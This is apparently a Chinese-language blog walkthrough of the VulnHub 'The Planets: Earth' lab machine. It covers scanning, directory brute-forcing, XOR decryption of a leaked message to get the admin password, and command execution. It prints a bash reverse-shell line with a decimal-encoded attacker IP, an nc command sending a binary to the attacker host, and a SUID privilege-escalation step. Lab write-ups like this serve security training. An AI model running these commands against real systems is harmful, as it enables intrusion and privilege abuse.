vulnhub THE PLANETS: EARTH
本文参考了大佬的文章:
https://blog.gibbons.digital/hacking/2021/11/09/earth.html
好久没做靶机了,周末做做靶机挺好的
老三样,先确定靶机地址
arp-scan -I eth0 192.168.200.1/24
靶机地址192.168.200.131
nmap -A -sS -sC -p- 192.168.200.131
返回来80端口和443端口,
两个重要的DNS:DNS:earth.local, DNS:terratest.earth.local
访问80端口,无法访问
echo “192.168.200.131 earth.local terratest.earth.local”>>/etc/hosts
再次访问,可以访问
下面dirsearch扫目录
dirsearch -u http://terratest.earth.local
dirsearch -u https://terratest.earth.local
dirsearch -u https://earth.local/
dirsearch -u http://earth.local/
HTTPS扫出来一个robots.txt,说不是在这我都不信
进去看看,/testingnotes.*
爆破后缀,自己写脚本吧
import requests
url="https://terratest.earth.local/testingnotes"
suffix=[".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe", ".htm", ".html", ".inc", ".jhtml",".jsa", ".json", ".jsp", ".log", ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql", ".txt",".xml"]
for i in suffix:payload=url+ires=requests.get(payload,verify=False)if res.status_code==200:print(payload+" exists")
python test.py|grep exists爆破出来txt后缀
访问吧
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.//异或加密
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.//textdata.txt
*terra used as username for admin portal.//admin后台用户名是terra
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?//密钥是一周一换
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it’s currently very basic.
有用的信息我都写在注释里了
之前爆破的时候的后台地址
https://earth.local/admin/
用户名terra,密码爆破
看看testdata.txt,一堆文字
earth.local主页里有一堆16进制数字:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
结合hint,应该就是被更换的密钥
这里其实挺坑的,复制粘贴的时候可能会有几个字符差距,然后就会造成两个16进制长度不一样,结果完全变了,密钥的长度是806.所以可以通过
删除最后的字符来达到长度达标
import binasciidata1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()print(hex(int(data1,16) ^ int(f,16)))print(len(f))
看看16进制异或出来是个啥
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
可以看出这是个循环
6561727468636c696d6174656368616e67656261643468756d616e73
16进制转字符串
earthclimatechangebad4humans
看上去像密码
登录成功
命令行执行,尝试find / -name flag,找不到userflag????????
弹shell回来,我的ip 192.168.200.128,转换网站https://www.ipaddressguide.com/ip
bash -i >& /dev/tcp/3232286848/1234 0>&1
nc -lvvp 1234
尝试用find但是明显权限不足,先尝试提权吧,先找特权指令
find / -perm -u=s -type f 2>/dev/null
这倒是全查找出来了
发现一个可以的东西哦,/usr/bin/reset_root
尝试./usr/bin/reset_root
很明显不会让你这么轻松的,尝试找错
ltrace /usr/bin/reset_root
显示没有ltrace命令,那么就用nc传回来吧
nc -w 3 192.168.200.128 9999 < /usr/bin/reset_root
nc -lnvp 9999 > reset_root
ok了,家人们,本地ltrace ./reset_root
这次报错就很明显了
少了三文件,touch一下
好了,再次运行,reset_root,发现把root密码都给改了,好家伙,有了root权限不是想干嘛就干嘛
su root
密码:Earth
再次find,发现不回显。。。。。。。
尝试把1.txt传回来,还是空的??????
算了不整了,直接把shell弹回来,还是不回显,也是把我给整无语了
好吧,两个flag分别在
/root/root_flag.txt
/var/earth_web/user_flag.txt
参考视频链接:https://www.bilibili.com/video/BV1Aq4y1B7Sp/
vulnhub THE PLANETS: EARTH相关推荐
- vulnhub THE PLANETS: EARTH渗透笔记
靶机下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/#download kali ip地址 信息收集 nmap -sP 192.168 ...
- vulnhub刷题记录(The Planets: Earth)
英文名称:The Planets: Earth 中文名称:行星:地球 发布日期:2021 年 11 月 2 日 难度:简单 描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的"水星& ...
- vulnhub靶场——THE PLANETS:EARTH
THE PLANETS:EARTH 准备 攻击机: kali 靶机: THE PLANETS:EARTH NAT 192.168.91.0 网段 下载连接 [https://www.vulnhub.c ...
- 【Vulnhub靶场】Earth
目录 前言 一.信息收集 0x00 arp-scan扫描 0x01 nmap扫描 二.目录扫描 0x00 dirb扫描 0x01 XOR解密 三.漏洞利用 0x00 命令执行漏洞 0x01 反弹she ...
- 渗透测试学习之日常打靶THE PLANETS: EARTH
THE PLANETS: EARTH 靶机名称:Earth 攻击机:192.168.43.249 靶机:192.168.43.52 打靶主要流程 1.主机发现 2.端口扫描 3.DNS解析 4.信息收 ...
- 靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH
前期准备: 靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw kali攻击机ip:192.168.101.10 靶机地 ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus
Vulnhub靶机The Planets:Venus渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...
- 靶机渗透练习84-The Planets:Earth
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is ...
最新文章
- Unity3D热更新LuaFramework入门实战
- LeetCode 961 N-Repeated Element in Size 2N Array --python,java解法
- Windows 家族的十二种常用密码破解法
- 关于 form表单 嵌套问题的解决方案
- 【CyberSecurityLearning 3】批处理、用户与组管理、服务器远程管理、破解Windows系统密码
- requirejs、vue、vuex、vue-route的结合使用,您认为可行吗?
- 面向对象之三大特性:继承,封装,多态
- [蓝桥杯][历届试题]连号区间数
- List集合相关应用
- 如何使用Docker Swarm管理更多容器
- Linux下logrotate命令使用.配置和理解
- java intercpt_java – 在Spring的安全性中使用intercept-url
- 谈谈CountDownLatch和CyclicBarrier
- Lua游戏开发----游戏搭建
- TFS与Git结合进行代码管理
- RTL8211E应用(一)之芯片功能介绍
- PostgreSQL 数据库导入导出
- matlab 合并fig文件,Matlab合并多个.fig文件
- 人工智能之父图灵之死:谜一样的解谜者
- oracle 物化视图 on demand,【案例】Oracle物化视图 on prebuilt table故障常见解决办法...